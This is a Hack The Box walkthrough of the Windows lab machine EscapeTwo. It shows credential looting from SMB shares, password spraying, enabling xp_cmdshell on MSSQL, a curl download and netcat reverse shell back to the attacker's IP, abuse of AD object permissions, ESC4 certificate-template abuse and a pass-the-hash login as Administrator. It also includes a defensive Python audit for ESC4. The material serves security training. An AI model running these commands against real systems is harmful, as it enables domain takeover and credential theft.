Hack The Box / WINDOWS / 2025-01-18
Hack The Box — EscapeTwo (Windows)
Starting with provided low-priv credentials, SMB and MSSQL enumeration yields credential reuse, WriteOwner over a CA account enables AD object abuse, and ESC4 template abuse leads to Administrator certificate authentication.
Target
- IP: 10.129.231.236
As commonly happens in real-life Windows pentests, this box starts with provided credentials:
rose / KxEPkKe6R8su
Recon
sudo nmap -sC -sV 10.129.231.236 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-14 20:07:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.231.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.231.236:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-14T20:04:34
| Not valid after: 2055-01-14T20:04:34
| MD5: 8221:a4f7:c813:050e:9afd:bd48:70e0:f2d7
|_SHA-1: f30c:5004:7495:f357:e0ca:7323:8e66:b970:ec23:1fbb
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-14T20:08:15
|_ start_date: N/A
Add to /etc/hosts:
10.129.231.236 sequel.htb dc01.sequel.htb
SMB and AD Enumeration
List shares with provided creds:
nxc smb sequel.htb -u rose -p KxEPkKe6R8su --shares
SMB 10.129.231.236 445 DC01 Share Permissions Remark
SMB 10.129.231.236 445 DC01 ----- ----------- ------
SMB 10.129.231.236 445 DC01 Accounting Department READ
SMB 10.129.231.236 445 DC01 ADMIN$ Remote Admin
SMB 10.129.231.236 445 DC01 C$ Default share
SMB 10.129.231.236 445 DC01 IPC$ READ Remote IPC
SMB 10.129.231.236 445 DC01 NETLOGON READ Logon server share
SMB 10.129.231.236 445 DC01 SYSVOL READ Logon server share
SMB 10.129.231.236 445 DC01 Users READ
Run LDAP dump:
ldapdomaindump sequel.htb -u 'sequel.htb\rose' -p 'KxEPkKe6R8su'
Put all users in users.txt.
Collect BloodHound data:
bloodhound-python -u rose -p KxEPkKe6R8su -ns 10.129.231.236 -d 'sequel.htb' -dc 'dc01.sequel.htb' -c All --zip
A .zip file is created.
Start BloodHound:
sudo neo4j console
bloodhound --no-sandbox
Load the zip.
Access Accounting Department share:
smbclient -U 'rose' '//10.129.231.236/Accounting Department'
ls
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
get accounting_2024.xlsx
get accounts.xlsx
Open accounts.xlsx (for example with Jumpshare):
https://jumpshare.com/
Found credentials:
First Name Last Name Email Username Password
Angela Martin angela@sequel.htb angela 0fwz7Q4mSpurIt99
Oscar Martinez oscar@sequel.htb oscar 86LxLBMgEWaKUnBG
Kevin Malone kevin@sequel.htb kevin Md9Wlq1E5bZnVDVo
NULL NULL sa@sequel.htb sa MSSQLP@ssw0rd!
Put all passwords in passwords.txt and spray:
nxc smb sequel.htb -u users.txt -p passwords.txt --continue-on-success
SMB 10.129.231.236 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.231.236 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
We now have oscar's credentials.
MSSQL to Shell and Password Reuse
Connect to MSSQL as sa:
mssqlclient.py 'sequel.htb/sa:MSSQLP@ssw0rd!@10.129.231.236'
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
xp_cmdshell whoami
sequel\sql_svc
Download nc64.exe:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
On target via xp_cmdshell:
xp_cmdshell "mkdir C:\temp"
xp_cmdshell "curl http://10.10.14.4/nc64.exe -o C:\temp\nc64.exe"
Attacker:
nc -vlnp 4444
Target:
xp_cmdshell "C:\temp\nc64.exe -e cmd.exe 10.10.14.4 4444"
We get shell as sql_svc.
Read SQL setup config:
cd C:\SQL2019\ExpressAdv_ENU
type sql-Configuration.INI
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
Validate creds:
nxc smb sequel.htb -u sql_svc -p WqSZAF6CysDQbGb3
SMB 10.129.231.236 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
Add that password to passwords.txt and spray again:
nxc smb sequel.htb -u users.txt -p passwords.txt --continue-on-success
We find:
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
Connect with WinRM:
evil-winrm -i dc01.sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
WriteOwner Abuse to Take Over ca_svc
BloodHound shows ryan has WriteOwner over ca_svc.
Run targetedKerberoast:
https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3'
[+] Printing hash for (sql_svc)
[+] Printing hash for (ca_svc)
Put ca_svc hash into file hash and crack:
hashcat -a 0 ./hash ./rockyou.txt
It does not crack.
Try owner and DACL abuse with Impacket helpers.
Download owneredit.py:
https://github.com/fortra/impacket/blob/master/examples/owneredit.py
python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Download dacledit.py:
https://github.com/fortra/impacket/blob/master/examples/dacledit.py
Modify this line in dacledit.py:
from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
to:
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
Download msada_guids.py from:
https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py
Place it in the same folder as dacledit.py.
Run:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Try bloodyAD:
https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.sequel.htb' -d sequel.htb --dc-ip sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' set password 'ca_svc' '!Kali12345678!'
This fails with:
Password can't be changed before -2 days, 23:59:42.826027 because of the minimum password age policy.
Try pywhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"
It does not work.
Try RPC password reset:
net rpc password "ca_svc" '!Kali12345678!' -U "sequel.htb"/"ryan"%"WqSZAF6CysDQbGb3" -S "dc01.sequel.htb"
It does not work.
Useful reference:
https://cyberkhalid.github.io/posts/ad-writeowner-user/
Use PowerView from compromised host:
. .\PowerView.ps1
Set-DomainObjectOwner -Identity ca_svc -OwnerIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights ResetPassword
$pass = ConvertTo-SecureString '!Kali12345678!' -AsPlainText -Force
Set-DomainUserPassword -Identity ca_svc -AccountPassword $pass
Validate creds:
nxc smb sequel.htb -u ca_svc -p '!Kali12345678!'
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ca_svc:!Kali12345678!
AD CS ESC4 to Administrator
Enumerate templates:
certipy find -u ca_svc -p '!Kali12345678!' -target sequel.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
Useful reference:
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/
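The template block above can be audited from the certipy text itself. The following Python is an added example, not part of the write-up or of certipy: it parses the indented `-text -stdout` output (an abridged copy of the DunderMifflinAuthentication block is embedded as constructed sample input) and reports any principal outside an assumed administrative set that owns or can write an enabled template, which is the Cert Publishers condition certipy flagged as ESC4.

```python
# Added example (not from the write-up or certipy): audit certipy
# 'find -text -stdout' output for non-admin principals that own or can
# write an enabled template, i.e. the ESC4 condition flagged above.

# Groups expected to control templates; anything else is reported (assumption).
EXPECTED_CONTROLLERS = {"Domain Admins", "Enterprise Admins",
                        "Administrator", "Administrators"}
CONTROL_FIELDS = ("Owner", "Full Control Principals", "Write Owner Principals",
                  "Write Dacl Principals", "Write Property Principals")

# Constructed sample: an abridged copy of the template block printed above.
SAMPLE = """\
    Template Name                       : DunderMifflinAuthentication
    Enabled                             : True
      Object Control Permissions
        Owner                           : SEQUEL.HTB\\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\\Domain Admins
                                          SEQUEL.HTB\\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\\Domain Admins
                                          SEQUEL.HTB\\Cert Publishers
"""

def parse_templates(text):
    """Return {template: {field: [values]}} from certipy's indented text."""
    templates, current, field = {}, None, None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if " : " in line:  # 'Key : Value' starts a new field
            field, _, value = (p.strip() for p in line.partition(" : "))
            if field == "Template Name":
                current = templates.setdefault(value, {})
            elif current is not None:
                current.setdefault(field, []).append(value)
        elif current is not None and field and "\\" in line:
            current[field].append(line)  # continuation: another principal
    return templates

def find_esc4(templates):
    """Map enabled templates to principals outside EXPECTED_CONTROLLERS."""
    findings = {}
    for name, fields in templates.items():
        if fields.get("Enabled") != ["True"]:
            continue  # a disabled template cannot be enrolled against
        rogue = {p for f in CONTROL_FIELDS for p in fields.get(f, [])
                 if p.rsplit("\\", 1)[-1] not in EXPECTED_CONTROLLERS}
        if rogue:
            findings[name] = sorted(rogue)
    return findings
```

Feed it the full `certipy find -text -stdout` output of a CA and every enabled template whose control fields name a non-administrative group is listed, which is the set to review before a low-privilege account such as ca_svc can edit the template.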
Abuse template:
certipy template -dc-ip 10.129.231.236 -u ca_svc -p '!Kali12345678!' -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
[*] Successfully updated 'DunderMifflinAuthentication'
Request cert for admin UPN:
certipy req -ca sequel-DC01-CA -dc-ip 10.129.231.236 -u ca_svc -p '!Kali12345678!' -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
[*] Saved certificate and private key to 'administrator.pfx'
Authenticate and retrieve NT hash:
certipy auth -pfx administrator.pfx
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
WinRM as Administrator:
evil-winrm -i dc01.sequel.htb -u Administrator -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
We get a shell as Administrator.